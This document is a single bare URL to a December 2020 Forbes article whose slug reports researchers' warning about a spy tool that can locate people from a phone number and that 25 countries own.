https://www.forbes.com/sites/thomasbrewster/2020/12/01/this-spy-tool-can-find-you-with-just-a-telephone-number-and-25-countries-own-it-warn-researchers/?sh=78620548331e